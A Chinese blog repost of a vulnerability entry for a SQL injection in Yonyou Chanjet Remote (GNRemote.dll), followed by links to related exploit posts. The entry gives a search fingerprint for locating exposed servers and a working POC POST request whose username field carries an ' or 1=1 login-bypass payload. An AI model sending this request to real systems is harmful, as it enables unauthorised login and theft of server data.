用友 畅捷通远程通 GNRemote.dll SQL注入漏洞

于 2024-09-10 08:57:38 发布
阅读量119 收藏
点赞数
文章标签: sql 数据库
原文链接:https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
版权

漏洞描述:

用友 畅捷通远程通 GNRemote.dll SQL注入漏洞,攻击者通过SQL注入可以获取服务器敏感信息或者使用万能密码登录设备

漏洞影响:

用友 畅捷通远程通

网络测绘:

body="远程通CHANJET_Remote"

漏洞复现

1.登陆界面

2.验证POC

POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl

username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1

花海392
关注
捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-08 382
捷通T+ KeyInfoList.aspx SQL注入漏洞(含批量验证poc)
用友捷CRM存在SQL注入漏洞
nnn2188185的博客
04-21 607
捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获得网站后台数据库信息,构成信息泄露风险。
用友远程
04-10
用于点对点得远程连接,可以绕开防火墙。两端分别运行vncclient.exe 和vncserver.exe被连接端用server
车辆监控服务平台platform存在SQL注入漏洞导致RCE
最新发布
weixin_43167326的博客
08-21 725
车辆监控服务平台发布新版本修复了一处SQL注入漏洞漏洞是由于天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞SQL注入实现文件写入进行远程代码执行,获取服务器权限。建议及时修复漏洞
远程访问捷通
m0_74288773的博客
05-12 327
捷通T+是一款财务管理软件,主要应用于中小型企业的财务核算、预算、成本管理、应收账款、应付账款、固定资产管理、多维度查询、报表分析等方面。可以使用专业的神卓互联内网穿透,将公司捷通T+主机 固定一个访问地址,这样可以过宽带网络就可以在家或出差随时随地访问捷通。5. 创建完成后,我们得到一个由神卓互联系统自动生成的一个 固定外网访问地址。2.下载支付宝开放平台的Java SDK,并将其导入到您的项目中。7. 这样就可以使用浏览器远程访问捷通了。在家怎么访问公司的捷通t+!一、下载神卓互联客户端。
如何远程捷通
weixin_44699208的博客
07-30 355
能够远程访问和操作办公软件变得越来越重要。对于使用捷通的用户来说,如何实现远程捷通的访问一直是一个备受关注的问题。作为一名使用者,我发现巴比达内网穿透为我们提供了一个完美的解决方案。
用友 服务器配置文件,用友远程服务器配置
weixin_32135505的博客
08-10 554
用友远程服务器配置 内容精选换一换本节操作以Windows Server 2012操作系统的云服务器为例介绍实现多用户登录的操作步骤。Windows server2012服务器默认能够支持两个用户同时远程登录,而过配置远程桌面会话主机和远程桌面授权,即可实现多用户远程登录。Windows 2012操作系统云服务器配置多用户登录的操作视频请点击:https://bbs.h本节操作以Windows...
用友远程操作系统授权破解补丁
03-26
这个是针对windows server 2003或者XP操作系统,超过2个用户,远程常常出问题的 在添加删除程序中的远程授权激活就可以用这个工具来完成 此工具不是破解远程的工具
漏洞复现】捷通TPlus KeyInfoList.aspx存在SQL注入漏洞
失心少年
04-19 142
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/tplus/UFAQD/KeyInfoList.aspx?捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。
【1day】复现用友捷通CRM create_site.phpSQL注入漏洞
记录并分享学习安全的知识点..
08-08 379
用友CRM是专为小企业量身打造的智慧型客户关系管理应用,它包括客户、商机、报价、团队管理、客户营销、客户服务、主题查询及统计分析,帮助企业管好客户、管好业务员、做好销售业务;系统还提供知、审批、短信、文档、任务等协作功能,提高销售团队的协作效率,其中 create_site.php接口存在时间盲注漏洞
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3602
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞复现 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
用友t3远程无法找到远程计算机,用友远程安装打印常见问题
weixin_33768246的博客
07-04 559
用友远程安装打印常见问题5.1、虚拟打印使用步骤Ø 服务器端安装好远程之后默认会生成一个ufprint打印机,请确保是工作状态。Ø 客户端打印首次需要从web页面上下载用友虚拟打印驱动进行默认安装。Ø 客户端打印,打印过程中要选择两次打印机,第一次选择“会话N中的UFprinter来自客户端的计算机名” 点击确定后会再次弹出选择打印机的对话框,这次选择本地的物理打印机即可实现打印功能。如果想实...
如何用友远程到服务器,用友远程安装常用的管理配置
weixin_30956665的博客
07-30 1536
用友远程安装常用的管理配置3.2.1. 管理应用程序登入远程管理界面之后,选择【管理】-> 【应用程序】管理员可以进行以下操作:添加应用程序 添加应用程序到远程系统。修改应用程序 修改应用程序的启动参数、连接设置、快捷方式等。删除应用程序 从远程系统中删除已经添加的应用。添加用户 把应用程序分配给某个用户,用户登录客户端时可见程序列表。删除用户 删除某用户对该应用程序的使用权。添加应...
如何用友远程到服务器,怎么安装用友T3远程
weixin_32553639的博客
07-30 3169
用友T3远程是一款用友远程接入软件,可以将C/S架构的软件变相实现B/S的功能,也就是局域网的软件变相在广域网上实现使用,另外远用友T3远程还有域名解析的功能,是动态域名解析哟,具体用友T3远程怎么应用这个大家下载后就知道了,今天给大家带来的是用友T3远程安装教程主要是教大家怎么安装用友T3远程远程接入软件的服务器和客户端。(1)在安装用友T3远程之前请先点击访问:http://www...
某知名系统漏洞挖掘与利用思路探索
C20220511的博客
09-19 1315
本文以安全研究为目的,分享对该套系统的代码审计和漏洞挖掘过程,文中所提到的漏洞均已提交给CNVD&CITIVD,请勿用做非法用途。
0day!!用友捷通某接口存在SQL注入漏洞-新接口-未公开
weixin_43167326的博客
03-14 338
该系统是一款主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。其中存在接口SQL注入漏洞,攻击者过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
漏洞复现】用友捷CRM存在SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
05-06 1204
用友捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。用友捷CRM存在SQL注入漏洞,攻击者可过使用工具获取数据库相关敏感信息,拿到服务器控制权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值